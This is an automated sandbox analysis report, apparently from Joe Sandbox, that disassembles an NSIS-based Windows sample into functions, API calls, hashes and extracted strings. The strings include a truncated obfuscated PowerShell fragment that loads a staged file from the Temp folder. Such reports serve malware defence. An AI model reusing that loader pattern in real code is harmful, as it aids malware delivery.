                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                • String ID: "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                • API String ID: 717251189-1264129387
                                                                • Opcode ID: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                • Instruction ID: e6e4ebc4b258379f565b747a0f7be2a01952c0151b7e77293941e8e44b6b8026
                                                                • Opcode Fuzzy Hash: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                • Instruction Fuzzy Hash: 12611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D
                                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 499 40176f-401794 call 402c41 call 405bd0 504 401796-40179c call 406284 499->504 505 40179e-4017b0 call 406284 call 405b59 lstrcatW 499->505 511 4017b5-4017b6 call 406518 504->511 505->511 514 4017bb-4017bf 511->514 515 4017c1-4017cb call 4065c7 514->515 516 4017f2-4017f5 514->516 524 4017dd-4017ef 515->524 525 4017cd-4017db CompareFileTime 515->525 518 4017f7-4017f8 call 405d55 516->518 519 4017fd-401819 call 405d7a 516->519 518->519 526 40181b-40181e 519->526 527 40188d-4018b6 call 4052ec call 403116 519->527 524->516 525->524 528 401820-40185e call 406284 * 2 call 4062a6 call 406284 call 4058ea 526->528 529 40186f-401879 call 4052ec 526->529 541 4018b8-4018bc 527->541 542 4018be-4018ca SetFileTime 527->542 528->514 562 401864-401865 528->562 539 401882-401888 529->539 543 402ace 539->543 541->542 545 4018d0-4018db CloseHandle 541->545 542->545 549 402ad0-402ad4 543->549 547 4018e1-4018e4 545->547 548 402ac5-402ac8 545->548 551 4018e6-4018f7 call 4062a6 lstrcatW 547->551 552 4018f9-4018fc call 4062a6 547->552 548->543 557 401901-4022fc call 4058ea 551->557 552->557 557->548 557->549 562->539 564 401867-401868 562->564 564->529
                                                                APIs
                                                                • lstrcatW.KERNEL32(00000000,00000000,Polystichoid,C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne,?,?,00000031), ref: 004017B0
                                                                • CompareFileTime.KERNEL32(-00000014,?,Polystichoid,Polystichoid,00000000,00000000,Polystichoid,C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne,?,?,00000031), ref: 004017D5
                                                                  • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                  • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                  • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                • String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne$C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini$Polystichoid$nerveklinikkernes
                                                                • API String ID: 1941528284-484877454
                                                                • Opcode ID: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
                                                                • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                • Opcode Fuzzy Hash: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
                                                                • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E
                                                                Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 565 4052ec-405301 566 405307-405318 565->566 567 4053b8-4053bc 565->567 568 405323-40532f lstrlenW 566->568 569 40531a-40531e call 4062a6 566->569 571 405331-405341 lstrlenW 568->571 572 40534c-405350 568->572 569->568 571->567 573 405343-405347 lstrcatW 571->573 574 405352-405359 SetWindowTextW 572->574 575 40535f-405363 572->575 573->572 574->575 576 405365-4053a7 SendMessageW * 3 575->576 577 4053a9-4053ab 575->577 576->577 577->567 578 4053ad-4053b0 577->578 578->567
                                                                APIs
                                                                • lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                • lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                • lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                • SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                • String ID: Completed
                                                                • API String ID: 2531174081-3087654605
                                                                • Opcode ID: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
                                                                • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                • Opcode Fuzzy Hash: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
                                                                • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8
                                                                Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 579 4065ee-40660e GetSystemDirectoryW 580 406610 579->580 581 406612-406614 579->581 580->581 582 406625-406627 581->582 583 406616-40661f 581->583 585 406628-40665b wsprintfW LoadLibraryExW 582->585 583->582 584 406621-406623 583->584 584->585
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                • wsprintfW.USER32 ref: 00406640
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                • API String ID: 2200240437-1946221925
                                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98
                                                                Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 586 403116-40312d 587 403136-40313e 586->587 588 40312f 586->588 589 403140 587->589 590 403145-40314a 587->590 588->587 589->590 591 40315a-403167 call 4032fb 590->591 592 40314c-403155 call 403311 590->592 596 4032b2 591->596 597 40316d-403171 591->597 592->591 600 4032b4-4032b5 596->600 598 403177-403197 GetTickCount call 4067bf 597->598 599 40329b-40329d 597->599 610 4032f1 598->610 612 40319d-4031a5 598->612 601 4032e6-4032ea 599->601 602 40329f-4032a2 599->602 604 4032f4-4032f8 600->604 605 4032b7-4032bd 601->605 606 4032ec 601->606 607 4032a4 602->607 608 4032a7-4032b0 call 4032fb 602->608 613 4032c2-4032d0 call 4032fb 605->613 614 4032bf 605->614 606->610 607->608 608->596 619 4032ee 608->619 610->604 616 4031a7 612->616 617 4031aa-4031b8 call 4032fb 612->617 613->596 623 4032d2-4032de call 405e2c 613->623 614->613 616->617 617->596 624 4031be-4031c7 617->624 619->610 629 4032e0-4032e3 623->629 630 403297-403299 623->630 626 4031cd-4031ea call 4067df 624->626 632 4031f0-403207 GetTickCount 626->632 633 403293-403295 626->633 629->601 630->600 634 403252-403254 632->634 635 403209-403211 632->635 633->600 636 403256-40325a 634->636 637 403287-40328b 634->637 638 403213-403217 635->638 639 403219-40324a MulDiv wsprintfW call 4052ec 635->639 641 40325c-403261 call 405e2c 636->641 642 40326f-403275 636->642 637->612 643 403291 637->643 638->634 638->639 644 40324f 639->644 647 403266-403268 641->647 646 40327b-40327f 642->646 643->610 644->634 646->626 648 403285 646->648 647->630 649 40326a-40326d 647->649 648->610 649->646
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CountTick$wsprintf
                                                                • String ID: ... %d%%
                                                                • API String ID: 551687249-2449383134
                                                                • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9
                                                                Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 650 405da9-405db5 651 405db6-405dea GetTickCount GetTempFileNameW 650->651 652 405df9-405dfb 651->652 653 405dec-405dee 651->653 655 405df3-405df6 652->655 653->651 654 405df0 653->654 654->655
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00405DC7
                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3), ref: 00405DE2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                • API String ID: 1716503409-2146733357
                                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64
                                                                Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 656 4023e4-402415 call 402c41 * 2 call 402cd1 663 402ac5-402ad4 656->663 664 40241b-402425 656->664 665 402427-402434 call 402c41 lstrlenW 664->665 666 402438-40243b 664->666 665->666 669 40243d-40244e call 402c1f 666->669 670 40244f-402452 666->670 669->670 674 402463-402477 RegSetValueExW 670->674 675 402454-40245e call 403116 670->675 678 402479 674->678 679 40247c-40255d RegCloseKey 674->679 675->674 678->679 679->663
                                                                APIs
                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000023,00000011,00000002), ref: 0040242F
                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 0040246F
                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 00402557
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CloseValuelstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini
                                                                • API String ID: 2655323295-919467500
                                                                • Opcode ID: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                • Opcode Fuzzy Hash: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68
                                                                Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 681 402d44-402d6d call 4060f1 683 402d72-402d74 681->683 684 402d76-402d7c 683->684 685 402dec-402df0 683->685 686 402d98-402dad RegEnumKeyW 684->686 687 402d7e-402d80 686->687 688 402daf-402dc1 RegCloseKey call 40665e 686->688 689 402dd0-402dde RegCloseKey 687->689 690 402d82-402d96 call 402d44 687->690 695 402de0-402de6 RegDeleteKeyW 688->695 696 402dc3-402dce 688->696 689->685 690->686 690->688 695->685 696->685
                                                                APIs
                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Close$Enum
                                                                • String ID:
                                                                • API String ID: 464197530-0
                                                                • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 782 4015c1-4015d5 call 402c41 call 405c04 787 401631-401634 782->787 788 4015d7-4015ea call 405b86 782->788 790 401663-402250 call 401423 787->790 791 401636-401655 call 401423 call 406284 SetCurrentDirectoryW 787->791 796 401604-401607 call 405838 788->796 797 4015ec-4015ef 788->797 803 402ac5-402ad4 790->803 804 40288b-402892 790->804 791->803 809 40165b-40165e 791->809 807 40160c-40160e 796->807 797->796 800 4015f1-4015f8 call 405855 797->800 800->796 815 4015fa-401602 call 4057bb 800->815 804->803 811 401610-401615 807->811 812 401627-40162f 807->812 809->803 813 401624 811->813 814 401617-401622 GetFileAttributesW 811->814 812->787 812->788 813->812 814->812 814->813 815->807
                                                                APIs
                                                                  • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,75573420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C12
                                                                  • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                  • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                  • Part of subcall function 004057BB: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne,?,00000000,000000F0), ref: 0040164D
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne, xrefs: 00401640
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                • String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne
                                                                • API String ID: 1892508949-334597386
                                                                • Opcode ID: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                                • Opcode Fuzzy Hash: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                                Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063C6,80000002), ref: 00406198
